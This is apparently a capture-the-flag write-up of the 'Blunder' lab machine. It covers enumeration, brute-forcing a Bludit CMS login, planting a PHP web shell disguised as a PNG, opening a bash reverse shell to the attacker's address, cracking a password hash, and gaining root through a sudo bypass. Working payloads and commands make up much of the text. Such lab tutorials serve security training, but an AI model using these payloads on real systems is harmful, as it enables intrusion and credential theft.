# Blunder

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FWYU9VyiHPXe5S9mQBmoF%2Fblunder.png?alt=media\&token=e3e0bcb2-1823-4561-98cb-fb861d3d871c)

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.191 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

```
# Nmap 7.92 scan initiated Thu Jun 23 20:11:07 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.076s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http

# Nmap done at Thu Jun 23 20:11:33 2022 -- 1 IP address (1 host up) scanned in 26.59 seconds
```

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p21,80 10.10.10.191 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Thu Jun 23 20:10:35 2022 as: nmap -sCV -p21,80 -oN targeted 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.054s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 23 20:10:58 2022 -- 1 IP address (1 host up) scanned in 23.53 seconds
```

Let's take a look at the website.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F6GlNvrFmkPxxHeCmLrun%2Fimage.png?alt=media\&token=db951012-ca13-4a61-97c5-8fe6b9d0ad2a)

Not much going on. Now, let's try to enumerate subdirectories with *gobuster*.

> gobuster dir -u <http://10.10.10.191> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php,txt

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.
* `-x` add the following extensions.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.191
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/06/23 23:40:28 Starting gobuster in directory enumeration mode
===============================================================
/about                (Status: 200) [Size: 3281]
/0                    (Status: 200) [Size: 7562]
/admin                (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/install.php          (Status: 200) [Size: 30]                                
/robots.txt           (Status: 200) [Size: 22]                                
/usb                  (Status: 200) [Size: 3960]                              
/todo.txt             (Status: 200) [Size: 118]                               
/LICENSE              (Status: 200) [Size: 1083]                              
Progress: 15450 / 262995 (5.87%)
                                                                              
===============================================================
2022/06/23 23:41:48 Finished
===============================================================
```

If we take a look at the `todo.txt` file, we'll see some potential user called `fergus`.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9nRtcsdGT53N7d8AoFM1%2Fimage.png?alt=media\&token=95965fd0-bbaa-49ab-b3f6-b488993b0fdf)

On the other hand, if we take a look at the `/admin` directory, we'll see an admin login panel for the *Bludit* CMS.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FtSrBSz00vQBZxdihPbYN%2Fimage.png?alt=media\&token=9e19579f-ebc0-45c4-a905-187d53ca7516)

## Exploitation

Let's try to look for common exploit of *Bludit* with searchsploit.

> searchsploit bludit

```
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit)                        | php/remote/47699.rb
Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)                              | php/webapps/50529.txt
Bludit 3.9.12 - Directory Traversal                                                | php/webapps/48568.py
Bludit 3.9.2 - Auth Bruteforce Bypass                                              | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)                       | php/webapps/49037.rb
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass                         | php/webapps/48746.rb
Bludit 3.9.2 - Directory Traversal                                                 | multiple/webapps/48701.txt
bludit Pages Editor 3.0.0 - Arbitrary File Upload                                  | php/webapps/46060.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

There is one called `Auth Bruteforce Bypass` which seems to allow us to brute force the login panel. Let's move it to the current directory.

> searchsploit -m php/webapps/48942.py

The script needs a file of users, and a file of passwords. First, let's create a file called `user` with the `fergus` user in it.

> echo "fergus" > user

Now, we need a file with passwords. We could use the *cewl* tool, which will create a dictionary of words based on the website.

> cewl -w passwords <http://10.10.10.191> --with-numbers

* `-w` write the output to a **file**.
* `--with-numbers` accept words with **numbers**.

Finally, we can run the python exploit indicating the *URL* of the login panel, the `user` file, and the `passwords` file.

> python 48942.py -l <http://10.10.10.191/admin/login.php> -u user -p passwords

* `-l` URL of the login panel.
* `-u` file with users.
* `-p` file with passwords.

```
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain
```

And we get some valid credentials, let's try them.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOtGnDwyDuQetDLgEfjhC%2Fimage.png?alt=media\&token=3f752e55-28d9-46a5-ba27-5c4ff43fd48c)

And we get in.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F3ATA1fTxbj4VVhAEhszK%2Fimage.png?alt=media\&token=fa949b3f-12de-400f-8e4c-832977de17b1)

If we take a look at the common exploits again, we'll see that there is one called `Directory Traversal`, let's move it to the current directory, and rename it with the `.py` extension.

> searchsploit -m multiple/webapps/48701.txt
>
> mv 48701.txt exploit.py

Before executing it, we'll have to modify it a bit. We'll have to change the url, username and password variables to the valid credentials.

```python
url = 'http://10.10.10.191'  # CHANGE ME
username = 'fergus'  # CHANGE ME
password = 'RolandDeschain'  # CHANGE ME
```

Now, we'll have to create a file called `evil.png` with some PHP code that will allow us to execute commands on the victim machine.

> nano evil.png

```php
<?php echo "<pre>" . system($_GET['cmd']) . "</pre>"; ?>
```

Then, let's execute the following commands that will create the `.htaccess` file with some configuration that will allow us to execute the `evil.png` as a *PHP* file.

> echo "RewriteEngine off" > .htaccess
>
> echo "AddType application/x-httpd-php .png" >> .htaccess

Finally, we could execute the exploit.

> python exploit.py

```
cookie: 1k28n37kgfhgtccnafspl3p282
csrf_token: 1ec69efb5a8c5be29855fb70a11b15fdf1d9d6e1
Uploading payload: evil.png
Uploading payload: .htaccess
```

If now we access the following URL, we'll be able to execute commands on the victim machine.

> <http://10.10.10.191/bl-content/tmp/temp/evil.png?cmd=whoami>

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F77dv2hRUfbzV7Yo51p9v%2Fimage.png?alt=media\&token=857e1b9f-5e9e-49bf-90b5-24966e0ef17c)

Time to get a shell. First, let's set a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

If now we access the following *URL*, we'll get a reverse shell as the `www-data` user.

> <http://10.10.10.191/bl-content/tmp/temp/evil.png?cmd=bash> -c "bash -i >%26 /dev/tcp/10.10.14.5/4444 0>%261"

```
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.191] 43748
bash: cannot set terminal process group (1272): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp/temp$ whoami
whoami
www-data
```

## Privilege Escalation

First, let's set an interactive *TTY* shell.

> script /dev/null -c /bin/bash&#x20;

Then I press `Ctrl+Z` and execute the following command on my local machine:

> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm

Next, I export a few variables:

> export TERM=xterm
>
> export SHELL=bash

Finally, I run the following command in our local machine:

> stty size

```
51 236
```

And set the proper dimensions in the victim machine:

> stty rows 51 columns 236

Let's enumerate the system users.

> grep sh /etc/passwd

```
root:x:0:0:root:/root:/bin/bash
shaun:x:1000:1000:blunder,,,:/home/shaun:/bin/bash
hugo:x:1001:1001:Hugo,1337,07,08,09:/home/hugo:/bin/bash
temp:x:1002:1002:,,,:/home/temp:/bin/bash
```

At this point, I started enumerating the machine, and I found the `/var/www/bludit-3.10.0a/bl-content/databases/users.php` config file with a password hash for the `hugo` user.

> cat /var/www/bludit-3.10.0a/bl-content/databases/users.php

```php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}
```

Let's make use of *rainbow tables* and try to find out the password.

{% hint style="info" %}
CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.

<https://crackstation.net/>
{% endhint %}

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FMKwbiZlqzOYbcmInW52G%2Fimage.png?alt=media\&token=4d5ad828-aa8d-40c2-b61b-073cc0c6590a)

Now we could become the `hugo` user, and grab the user flag.

> su hugo

```
Password: Password120
hugo@blunder:~$ cat /home/hugo/user.txt 
5720c9d1fce452b0d80d70793e9b4628
```

If we list the sudo privileges of the `hugo` user, we'll see that we can get a shell as any user, except the *root* user.

> sudo -l

```
Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
```

But, if we check the *sudo* version, we'll see that it is a vulnerable version.

> sudo --version

```
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
```

As [this CVE](https://www.exploit-db.com/exploits/47502) explains, we could bypass this rule. All we have to do is execute the following command, get a shell as root, and reap the harvest and take the root flag.

> sudo -u#-1 /bin/bash

```
root@blunder:/home/hugo# whoami
root
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# cat /root/root.txt 
2504f40023c2746b537a436087d1b622
```